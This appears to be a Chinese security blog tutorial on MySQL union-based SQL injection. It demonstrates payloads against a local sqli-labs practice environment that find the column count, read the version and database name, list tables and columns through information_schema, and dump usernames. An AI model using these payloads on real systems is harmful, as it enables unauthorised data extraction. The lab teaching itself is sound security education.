Mysql注入 -- 联合注入

时间：2021-05-13 14:10:00 来源：作者：web安全工具库

得到一个像原来老师一样督促你、关心你的人很难。。。

---- 网易云热评

一、常用命令及函数

1、order by排序，获取数据有几个字段，后面小于等于字段数，都会返回结果，大于字段数返回错误

select * from users order by 3；

2、union select联合查询，后边必须跟一样的字段数

select * from users union select 1,2,5;

3、user()查看当前MySQL用户

4、version()查看mysql版本信息

5、database()查看当前数据库名

select * from users union select user(),version(),database();

二、跨库查询

1、获取aiyou数据库中表

select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou";

2、获取下一个表格

select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou" limit 0,1;
select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou" limit 1,1;
select * from users union select 1,2,table_name from information_schema.tables where table_schema="aiyou" limit 2,1;

3、获取字段名

select * from users union select 1,2,column_name from information_schema.columns where table_name="bucuo";

4、获取字段内容

select * from users union select 1,2,username from users；

三、实例演示（sqli环境）

1、判断表有多少字段，order by 3返回正常，所以有三个字段

http://192.168.139.129/sqli/Less-2/?id=1 order by 3

2、联合查询可以显示的数列，让前面的select语句报错，才能执行后面的select语句

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,3

3、获取数据库名字和版本信息，因为1不能显示，所以将2和3替换为version(),database()

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,version(),database()

4、获取数据库security的表

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema="security"

获取第二个表、第三个表

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema="security" limit 1,1 --

5、获取表名为users的字段名

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name="users"
http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,column_name from information_schema.columns where table_name="users" limit 1,1 --

6、获取字段内容

http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,username from users
http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,username from users limit 1,1 --

禁止非法，后果自负

Tags：Mysql注入点击:() 评论:()

声明：本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com)，我们将及时更正、删除，谢谢。

▌相关推荐

Mysql注入总结

0×00：前言对于MYSQL知识的一个初总结 0×01：正文 MYSQL数据库特性1.Mysql数据库默认不区分大小写，利用此特性可以进行大小写过正则匹配，举个简单的例子，有的题目中只...【详细内容】

2021-07-29　　Tags: Mysql注入点击:(88)　　评论:(0)　　加入收藏

Mysql注入 -- 联合注入

得到一个像原来老师一样督促你、关心你的人很难。。。---- 网易云热评一、常用命令及函数1、order by排序，获取数据有几个字段，后面小于等于字段数，都会返回结果，大于字段数返回...【详细内容】

2021-05-13　　Tags: Mysql注入点击:(223)　　评论:(0)　　加入收藏

WEB渗透——MySQL注入原理与注入检测

MySQL注入原理SQL，叫做结构化的查询语言，所谓的SQL注入，就是把SQL命令插入到web表单提交或输入域名页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它就...【详细内容】

2020-08-17　　Tags: Mysql注入点击:(150)　　评论:(0)　　加入收藏

▌简易百科推荐

小白如何看出计算机操作系统是否开启勒索病毒危险端口

一、背景介绍永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获...【详细内容】

2021-12-27　　Kali与编程　　　　Tags:勒索病毒　点击:(3)　　评论:(0)　　加入收藏

盘点信息安全常见的Web漏洞

一、SQL注入漏洞SQL 注入攻击（ SQL Injection ），简称注入攻击、SQL注入，被广泛用于非法获取网站控制权，是发生在应用程序的数据库层上的安全漏洞。在设计程序，忽略了对输入字符串...【详细内容】

2021-12-10　　华清信安　　　　Tags:Web漏洞　点击:(23)　　评论:(0)　　加入收藏

从AD域安全防护痛点看安全可信网络体系搭建

AD域是目前大型企业常用的内网管理方案，但随着近年来实网演习的常态化和不断深入，AD域安全越来越得到企业的重视。不论是在演练还是在真实的高级攻击场景中，在复盘中可以看出，大...【详细内容】

2021-10-27　　　　中国信息安全　　Tags:AD域　点击:(38)　　评论:(0)　　加入收藏

网络安全，这些知识点你知道吗

网友们，过去一年，您的网络安全段位提升了吗？需要更多的专属利器加持吗？今年我们又为您准备了丰富的网络安全知识大餐，助您驰骋网络，为网络安全护航！2021年10月11日至17日为“国家网...【详细内容】

2021-10-13　　　　九派教育　　Tags:网络安全　点击:(49)　　评论:(0)　　加入收藏

内网渗透横向攻击流程

拓扑环境 Kali Linux（攻击机） Centos6.4（web服务器） win7（域成员主机无法上网） win2008R2（域控无法上网）目的通过Kali Linux拿到域控权限2021最新整理网络安全\渗透测试/安全学习（全...【详细内容】

2021-09-17　　KaliMa　　　　Tags:内网渗透　点击:(84)　　评论:(0)　　加入收藏

网络安全学习：内网渗透案例，打破渗透瓶颈

前言这又是一个关于域内基础概念与原理的系列Active Directory 的查询基础语法BaseDNBaseDN 即基础可分辨名称，其指定了这棵树的根。比如指定 BaseDN 为DC=whoamianony,DC=or...【详细内容】

2021-09-06　　KaliMa　　　　Tags:内网渗透　点击:(46)　　评论:(0)　　加入收藏

为什么说堡垒机是企业IT运维的“安全终结者”？

堡垒机，听起来就是一个够酷的名字，有用户笑言，听着名儿就觉着安全，就像大块头施瓦辛格一出现在电影镜头里就像终结者一样。那么，作为内网安全的"终结者",堡垒机究竟是个什么模样...【详细内容】

2021-08-26　　IT技术管理那些事儿　　　　Tags:堡垒机　点击:(76)　　评论:(0)　　加入收藏

如何下载各种虚拟机软件？

1、VMware Workstation Pro 16： https://download3.vmware.com/software/wkst/file/VMware-workstation-full-16.1.0-17198959.exe VMware Workstation Pro 15【建议】 ht...【详细内容】

2021-08-25　　Kali与编程　　　　Tags:虚拟机软件　点击:(71)　　评论:(0)　　加入收藏

网络安全学习路线是什么样的？网络安全学多久能找工作？

很多小伙伴都想入行网络安全，因为网络安全高薪，未来发展前景好，但是不知道网络安全学习路线是什么样的？网络安全学多久能找工作？我们就来梳理一下。网络安全虽然好上手，入门难度...【详细内容】

2021-08-23　　知了堂　　　　Tags:网络安全　点击:(72)　　评论:(0)　　加入收藏

IT程序员必知！TCP/IP为什么会有这么多的致命漏洞？

入侵一些网站，电脑，制作一些病毒，学会多项编程，这是一个普通黑客都会的技能，那么真正黑客能厉害到什么程度呢？除了勒索病毒，熊猫烧香等自动感染的病毒被大家熟知外，还有更厉害的骚操...【详细内容】

2021-08-19　　IT技术管理那些事儿　　　　Tags:漏洞　点击:(66)　　评论:(0)　　加入收藏

推荐资讯

远程软件发展迅猛，ToDe	倒计时！企业QQ即将下架
极简Windows11与iPhon	iPhone信号问题，花10元
惊人数据：App Store中4	个人所得税递延纳税报
非常实用的 Python 库	等离子电视技术先进，为

WEB渗透——MySQL注入原理与注入检测